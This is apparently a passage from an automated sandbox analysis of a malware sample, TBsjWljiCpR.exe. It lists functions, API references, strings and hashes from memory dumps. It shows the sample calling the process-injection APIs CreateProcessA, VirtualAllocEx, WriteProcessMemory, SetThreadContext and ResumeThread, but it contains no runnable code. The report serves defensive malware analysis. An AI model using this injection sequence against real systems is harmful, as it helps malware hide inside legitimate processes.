Opcode Fuzzy Hash: 1238f97cad941b574920752632f3ba4d9f2fc6b5c39bbe52e5a50ec3a4f8550f
Instruction Fuzzy Hash: F2E18B706087429FD725CF28CC84B2ABBE5AF84314F184AADF5A58B3E1D774D949CB42

Function 0162BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Resource at %p, xrefs: 01667B8E
RTL: Re-Waiting, xrefs: 01667BAC
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01667B7F

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 13895626bd436daf977b88b5f1cff9b013f86cf4756e352e7a40657c71b419a7
Instruction ID: 2b43be6210ff77fb09c14c7df684483b10bb2ca9f4a588cbbf90cf1f93be5aa9
Opcode Fuzzy Hash: 13895626bd436daf977b88b5f1cff9b013f86cf4756e352e7a40657c71b419a7
Instruction Fuzzy Hash: C341B031705B029FD720DE2DCC40F6AB7E5EB98720F100A1DE9AA9B780DB71E9058F95

Function 0162B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0166728C

Strings

RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01667294
RTL: Resource at %p, xrefs: 016672A3
RTL: Re-Waiting, xrefs: 016672C1

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: ae9cf13940f94b9a51013309d6afdc5edb2363f275c29957dc6230421134d8b8
Instruction ID: 3fe4ffe1919456cfb9d646c1e167e3680fc1975e088eaf9172eb1096c68d44fb
Opcode Fuzzy Hash: ae9cf13940f94b9a51013309d6afdc5edb2363f275c29957dc6230421134d8b8
Instruction Fuzzy Hash: FF412031701616ABD720DE69CC81F6AB7AAFF94714F10461DFD55AB340DB20F8428BD1

Function 016A2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 016A238D
___swprintf_l.LIBCMT ref: 016A23B3

Strings

]:%u, xrefs: 016A23AA
%%%u, xrefs: 016A2384

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: 0c4a2b22f55de63421301884549bbffc5ad22c081b0d21242ccfd2fc09883d44
Instruction ID: 1a9076139e523ecf41e19969749d0dce0cd86d53a93c82908daed3b7b6d24d97
Opcode Fuzzy Hash: 0c4a2b22f55de63421301884549bbffc5ad22c081b0d21242ccfd2fc09883d44
Instruction Fuzzy Hash: 2C318472A002299FDB24DE2DCC50BEEB7F9EF45610F84055DE949E7240EB309E548FA0

Function 01637D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01637E8B

Strings

+, xrefs: 01637DE8
-, xrefs: 01637DDD

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction ID: f8425a9bdf600bed6e08fc8d8d0cf0a656916d19e56a91c63fb95928803c6133
Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction Fuzzy Hash: 969160B1E0021A9AEB24DF6DCC816BEBBA5FFC4720F14461EE955A73C0D7309941CB65

Function 015F9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 015F9191
@, xrefs: 015F9175

Memory Dump Source

Source File: 00000008.00000002.1946419926.00000000015C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_15c0000_FGGx944Qu7.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 7403c41bccc6138bc736f75748f51873fb073e590bcf461a30eabcc8964a1b44
Instruction ID: d8ac35a393a30bd4bb4533bcdd4021acb5002bba433b009968afd9d9fdb05694
Opcode Fuzzy Hash: 7403c41bccc6138bc736f75748f51873fb073e590bcf461a30eabcc8964a1b44
Instruction Fuzzy Hash: 9A811971D00669DBDB35CB54CC54BEEBBB5AB48714F0441EEAA09B7280D7709E84CFA4

Analysis Process: TBsjWljiCpR.exePID: 7680, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	69
Total number of Limit Nodes:	1

Executed Functions

Function 02F3E76D Relevance: 1.7, APIs: 1, Instructions: 249
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02F3E9AE

Memory Dump Source

Source File: 00000009.00000002.1884613632.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f30000_TBsjWljiCpR.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: bd1fde25c9ac6d5c04a01bc64297330b8dce97e6a51059926860b2e3e022b0a9
Instruction ID: 8f6d2cc9cff670965a86c34f6ea376edbf266b69bee285559a0c51431448db09
Opcode Fuzzy Hash: bd1fde25c9ac6d5c04a01bc64297330b8dce97e6a51059926860b2e3e022b0a9
Instruction Fuzzy Hash: 45A17C71D00219CFDF21DF68C880BEDBBB2BF48354F1485A9E958A7290DB749985CF92

Function 02F3E778 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02F3E9AE

Memory Dump Source

Source File: 00000009.00000002.1884613632.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f30000_TBsjWljiCpR.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 3e125160037560355cf0ccee1a71ecd61c34e926860afb0454ec3780930c76c4
Instruction ID: c708e69beb5b25d5d6ff2237d7b9ce584e582528ca6d798cc97146467d9bacb8
Opcode Fuzzy Hash: 3e125160037560355cf0ccee1a71ecd61c34e926860afb0454ec3780930c76c4
Instruction Fuzzy Hash: 5F917C71D00219CFDF21DFA8C841BEDBBB2BF48354F1485A9E949A7240DB749985CF92

Function 0161B1F0 Relevance: 1.7, APIs: 1, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0161B446

Memory Dump Source

Source File: 00000009.00000002.1870880972.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1610000_TBsjWljiCpR.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 1d8ecb22062dab7681363908de7e16fd5a07c810ddd6d72a2bc2acc63c9ab904
Instruction ID: 1493ffdacea25bcdca73bc2edd42db0cb27786337bff05564c1ff98bb790a0c1
Opcode Fuzzy Hash: 1d8ecb22062dab7681363908de7e16fd5a07c810ddd6d72a2bc2acc63c9ab904
Instruction Fuzzy Hash: A1712470A00B058FD724DF6AD5447AABBF1FF88200F148A2DD48ADBB54DB74E949CB91

Function 01614514 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 016159C9

Memory Dump Source

Source File: 00000009.00000002.1870880972.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1610000_TBsjWljiCpR.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: d488db513bef3f8e2077d565c582e853fde69184b342fe24b4bb665fa94f6281
Instruction ID: 35c82a542be13187f5da474c78eea9983b4a2d616e9404b2368347d3c647cbd0
Opcode Fuzzy Hash: d488db513bef3f8e2077d565c582e853fde69184b342fe24b4bb665fa94f6281
Instruction Fuzzy Hash: 8241E2B0C00719CBDB24CFA9C88469DFBB6BF89304F24805AD409AB255DB756945CF91

Function 0161590C Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 016159C9

Memory Dump Source

Source File: 00000009.00000002.1870880972.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1610000_TBsjWljiCpR.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 2d26ccbf3efdb4af7af7e7f98d8db5df5f8a9658cff1be917e083aca42b67e79
Instruction ID: a0314eaf0d4ea7c0c03b6bf44cebdcd29c946c11c9f5e4efc2ed26bf9c2e2378
Opcode Fuzzy Hash: 2d26ccbf3efdb4af7af7e7f98d8db5df5f8a9658cff1be917e083aca42b67e79
Instruction Fuzzy Hash: FB4100B1C00719CEDB24CFA9C8847CDFBB6BF89304F24815AD409AB255DB755945CF90

Function 02F3E4E9 Relevance: 1.6, APIs: 1, Instructions: 76
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02F3E580

Memory Dump Source

Source File: 00000009.00000002.1884613632.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f30000_TBsjWljiCpR.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 644ceac23c6979c43b5bcc8e606a073ade374723e839371bd3ac77a292eedc89
Instruction ID: 224e4f3e79cf4de5f053ce97f00ac7fecfb23ec5b47964fec248eda266a04662
Opcode Fuzzy Hash: 644ceac23c6979c43b5bcc8e606a073ade374723e839371bd3ac77a292eedc89
Instruction Fuzzy Hash: F93154B1900349DFCB10CFA9C884BEEBFF1EF48314F10842AE958A7241D7759945CBA0

Function 02F3E4F0 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02F3E580

Memory Dump Source

Source File: 00000009.00000002.1884613632.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f30000_TBsjWljiCpR.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 02ce141dfe5a3561894231057527805336abfffb73550e0ff9f71f6f96d11f7c
Instruction ID: 83acb0729387c8951d20a72567dd88178eba1fd9dc39755771ae7ab49e796fa4
Opcode Fuzzy Hash: 02ce141dfe5a3561894231057527805336abfffb73550e0ff9f71f6f96d11f7c
Instruction Fuzzy Hash: 312144B29003099FCB10CFA9C880BEEBBF5FF48314F10842AE959A7240D7789944CBA4

Function 02F3E350 Relevance: 1.6, APIs: 1, Instructions: 67
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02F3E3D6

Memory Dump Source

Source File: 00000009.00000002.1884613632.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f30000_TBsjWljiCpR.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 5672b0bd7cec272f006751e775263b5d2258e4c67dd76e53454b0cc707d95537
Instruction ID: 9bc1346d35b0faf2174148c2c70d971b651dd0ad6661e1350aefa69f007043b5
Opcode Fuzzy Hash: 5672b0bd7cec272f006751e775263b5d2258e4c67dd76e53454b0cc707d95537
Instruction Fuzzy Hash: 512145B1D002098FDB10DFAAC5857EEBBF4EF88364F14842AD559A7340CB78A944CFA1

Function 02F3E5D8 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02F3E660

Memory Dump Source

Source File: 00000009.00000002.1884613632.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f30000_TBsjWljiCpR.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: cd4b491981eae73f5dffc9b8fe307958bb1872829b67f58a674b3b6a6a526a4e
Instruction ID: 49fabba2ac5b2ade28bd97de4c8ef807b186d2b1ad807ed0da9bfac3c4e7e4cd
Opcode Fuzzy Hash: cd4b491981eae73f5dffc9b8fe307958bb1872829b67f58a674b3b6a6a526a4e
Instruction Fuzzy Hash: DC2144B2C002499FCB10DFA9C984AEEBBF1FF48310F10842AE559A7250C7789944CFA5

Function 0161D258 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0161D68E,?,?,?,?,?), ref: 0161D74F

Memory Dump Source

Source File: 00000009.00000002.1870880972.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1610000_TBsjWljiCpR.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: fd386ebb0de586dde74c7dae0b5a76c1e2f97da6e13f53572de38de48ea5d4b5
Instruction ID: 10b3373063d77bd0c72fb6521defd17f053b9da186576b19cdca486851a4c36b
Opcode Fuzzy Hash: fd386ebb0de586dde74c7dae0b5a76c1e2f97da6e13f53572de38de48ea5d4b5
Instruction Fuzzy Hash: E921E4B5900258DFDB10CF9AD984AEEFFF4EB48320F14841AE918A7350D374A944CFA5

Function 0161D6C0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0161D68E,?,?,?,?,?), ref: 0161D74F

Memory Dump Source

Source File: 00000009.00000002.1870880972.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1610000_TBsjWljiCpR.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e1638b6ea4f6237f91b0b67bf7a08261bcbbc366ffe8cb447f255430b6da5f2a
Instruction ID: 79f58fa6f7cebdcbbf43d185002fa72f11278f9644a6b19130fadf63ce33b146
Opcode Fuzzy Hash: e1638b6ea4f6237f91b0b67bf7a08261bcbbc366ffe8cb447f255430b6da5f2a
Instruction Fuzzy Hash: E221E2B5D00248DFDB10CFA9D984AEEBBF8FB48310F14841AE958A7310D374A944CFA5

Function 02F3E358 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02F3E3D6

Memory Dump Source

Source File: 00000009.00000002.1884613632.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f30000_TBsjWljiCpR.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ff634d0fbebef9bc58f3c4e825076eccc1c2fb99f08bb493d8b8db3386d18c8a
Instruction ID: 99574057bb3acb4391ca6726f04751247082792542ded32d6d7c2f3c734b68c3
Opcode Fuzzy Hash: ff634d0fbebef9bc58f3c4e825076eccc1c2fb99f08bb493d8b8db3386d18c8a
Instruction Fuzzy Hash: 5D2137B1D002098FDB10DFAAC4857EEBBF4EF88324F10842AD559A7240CB78A944CFA5

Function 02F3E5E0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02F3E660

Memory Dump Source

Source File: 00000009.00000002.1884613632.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f30000_TBsjWljiCpR.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 3a4b8e0a169ae8a8e8e15dd5e5bb01ad3e5b2e1ccfebe2623fa83661b7e8ec59
Instruction ID: 2f7aedf638a345ef0e7cda6484b4bf4b5648b1b17cc5a9a75701fe8e0c21e92b
Opcode Fuzzy Hash: 3a4b8e0a169ae8a8e8e15dd5e5bb01ad3e5b2e1ccfebe2623fa83661b7e8ec59
Instruction Fuzzy Hash: 572125B1D002599FCB10DFAAC880AEEFBF5FF48320F50842AE559A7250C7389944CFA5

Function 0161AF08 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0161B4C1,00000800,00000000,00000000), ref: 0161B6D2

Memory Dump Source

Source File: 00000009.00000002.1870880972.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1610000_TBsjWljiCpR.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 88e978782d53c6b67271f9f0c8deefe1765833f910aa3cb08c9bd695721c5bfc
Instruction ID: e5508f5db0f88d64c8b62a9be9654096ea6f9686536ef19b569f31e2d7ba12bf
Opcode Fuzzy Hash: 88e978782d53c6b67271f9f0c8deefe1765833f910aa3cb08c9bd695721c5bfc
Instruction Fuzzy Hash: AB1126B6D003598FDB10DF9AC844ADEFBF4EB98310F14882AE519A7310C775A945CFA5

Function 02F3E430 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02F3E49E

Memory Dump Source

Source File: 00000009.00000002.1884613632.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f30000_TBsjWljiCpR.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fde694853eb276fa2436271d273f80ec5db246e3d2856bd923860d06074d764e
Instruction ID: 402f49feebc1c95db9c04483342a5bf7e8446710085da7775f8e50a81a94abcf
Opcode Fuzzy Hash: fde694853eb276fa2436271d273f80ec5db246e3d2856bd923860d06074d764e
Instruction Fuzzy Hash: D21167759002498FCB10DFAAC844BDFBFF5EF88324F208819E559A7250C735A544CFA1

Function 0161B660 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0161B4C1,00000800,00000000,00000000), ref: 0161B6D2

Memory Dump Source

Source File: 00000009.00000002.1870880972.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1610000_TBsjWljiCpR.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9236658e64b7c04d908b38f47875a03b87a2271f02e7e955802d4ef99ef1337d
Instruction ID: 4a7029f4b4a0ec942a67a4200eb572ae2b55e99516d2ec945c784d5d46c64de5
Opcode Fuzzy Hash: 9236658e64b7c04d908b38f47875a03b87a2271f02e7e955802d4ef99ef1337d
Instruction Fuzzy Hash: F8111FB6D002188FDB10CFAAC944ADEFBF4AB58320F14892AE959A7310C375A545CFA5

Function 02F3E2A0 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 02F3E30A

Memory Dump Source

Source File: 00000009.00000002.1884613632.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f30000_TBsjWljiCpR.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 2ec2bae9327b17ad03fcafc4331aa7a835ce218b1663dab368b3682775fd5605
Instruction ID: 6fb4aff95f4291fb095418606a28f3dfe04635ba7bd5195840544a77572abd9b
Opcode Fuzzy Hash: 2ec2bae9327b17ad03fcafc4331aa7a835ce218b1663dab368b3682775fd5605
Instruction Fuzzy Hash: DA1134B1D002488ACB20DFAAC4447EEBBF4EF88324F24881AC559A7250CB35A945CF95

Function 02F3E428 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02F3E49E

Memory Dump Source

Source File: 00000009.00000002.1884613632.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f30000_TBsjWljiCpR.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1740ac817c6a88b1b1b5b009d1b6557ac3746e1b092d85f13a9d49b7882f786a
Instruction ID: 889726674b3b784cbac2d90b4c3b49731b11f950976c18aef6d6561b0807b468
Opcode Fuzzy Hash: 1740ac817c6a88b1b1b5b009d1b6557ac3746e1b092d85f13a9d49b7882f786a
Instruction Fuzzy Hash: DB1167B5900249CFDB20DFA9C944BEEBFF1AF88324F20881AE559A7250C7759544CFA1

Function 02F3E2A8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 02F3E30A

Memory Dump Source

Source File: 00000009.00000002.1884613632.0000000002F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f30000_TBsjWljiCpR.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f505bf8c9962e707d4f4f0480793259264e5b29ce597a2bcd817910ecebcd0dd
Instruction ID: 903eedba296e1d7f0a4e7dfa08d33f739844b92ee26f4423742b5a42d7eb9135
Opcode Fuzzy Hash: f505bf8c9962e707d4f4f0480793259264e5b29ce597a2bcd817910ecebcd0dd
Instruction Fuzzy Hash: 181128B1D002488BCB10DFAAC4457DEFBF5EF88324F208819D559A7250CB75A944CF95

Function 0161B3E0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0161B446

Memory Dump Source

Source File: 00000009.00000002.1870880972.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1610000_TBsjWljiCpR.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: cda785350cc9b7819aaff046c2f1ff546dd3dd2a6343469c2b34cb75cd6f5012
Instruction ID: 313951c0d4813a6f441f33a7ddfd4b1a82091a8dab8ce37f00447d89ac3872e0
Opcode Fuzzy Hash: cda785350cc9b7819aaff046c2f1ff546dd3dd2a6343469c2b34cb75cd6f5012
Instruction Fuzzy Hash: 05110CB6C002498FDB10CF9AD844ADEFBF4AB88220F14C52AD929B7214C379A545CFA5

Function 015BD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1869037731.00000000015BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15bd000_TBsjWljiCpR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56e84829b43068b2b8567617c4d261afff77fe0dd88071b1556691f6671c385a
Instruction ID: fccc045c06d46586bb00aecd19793ee08fda9a9b7bbf261883910b579dd3aaed
Opcode Fuzzy Hash: 56e84829b43068b2b8567617c4d261afff77fe0dd88071b1556691f6671c385a
Instruction Fuzzy Hash: 6F212871500204DFDB05DF58D9C0BAABFB5FB94318F20C569D9094F256C37AE456C6A1

Function 015CD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1869246205.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15cd000_TBsjWljiCpR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28b7a95e17d7adc17699cdcca754ace51f9ad18bf5179bf7ce352951eca43e2f
Instruction ID: 52e3dd6196ddc941f696c3092f58356cd665ff95d7db74ac60485121c78b1e67
Opcode Fuzzy Hash: 28b7a95e17d7adc17699cdcca754ace51f9ad18bf5179bf7ce352951eca43e2f
Instruction Fuzzy Hash: A8210075604200DFCB15DF98D984B2ABBB5FB84B14F20C97DD80A9F256D33AD447CAA1

Function 015CD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1869246205.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15cd000_TBsjWljiCpR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56673758f1b7f1278bb9d931b095cc9b60e2ed0e446bc3d6ae7d2c9e86338133
Instruction ID: 667459e4a9fb61c175fd19ba9bbd6c9b094eff0f36b29f274077d75a21852859
Opcode Fuzzy Hash: 56673758f1b7f1278bb9d931b095cc9b60e2ed0e446bc3d6ae7d2c9e86338133
Instruction Fuzzy Hash: 9D21F571504200DFDB05DF98D9C4B2ABBB6FB84724F20C97DD9498F256C33AD446CAA1

Function 015CD006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1869246205.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15cd000_TBsjWljiCpR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d22f97396d99d3e488d4d823b7912d68751f4de9a981e63db4c8c9cb8942104
Instruction ID: e80a9362568cafb070cc37fdb4846c489a0df1a53c1c8199450973a00b1652ec
Opcode Fuzzy Hash: 5d22f97396d99d3e488d4d823b7912d68751f4de9a981e63db4c8c9cb8942104
Instruction Fuzzy Hash: 06217F755093808FDB12CF68D594715BF71FB46214F28C5EAD8498F6A7C33A980ACBA2

Function 015BD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1869037731.00000000015BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15bd000_TBsjWljiCpR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction ID: 6840a449b03ab5dec003b8a5cf2d7489c95de20fd76eecd853b5f9721f2efea2
Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
Instruction Fuzzy Hash: 4111DF72404240CFDB02CF44D5C4B9ABF71FB94328F24C6A9D9090F256C37AE45ACBA2

Function 015CD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1869246205.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15cd000_TBsjWljiCpR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
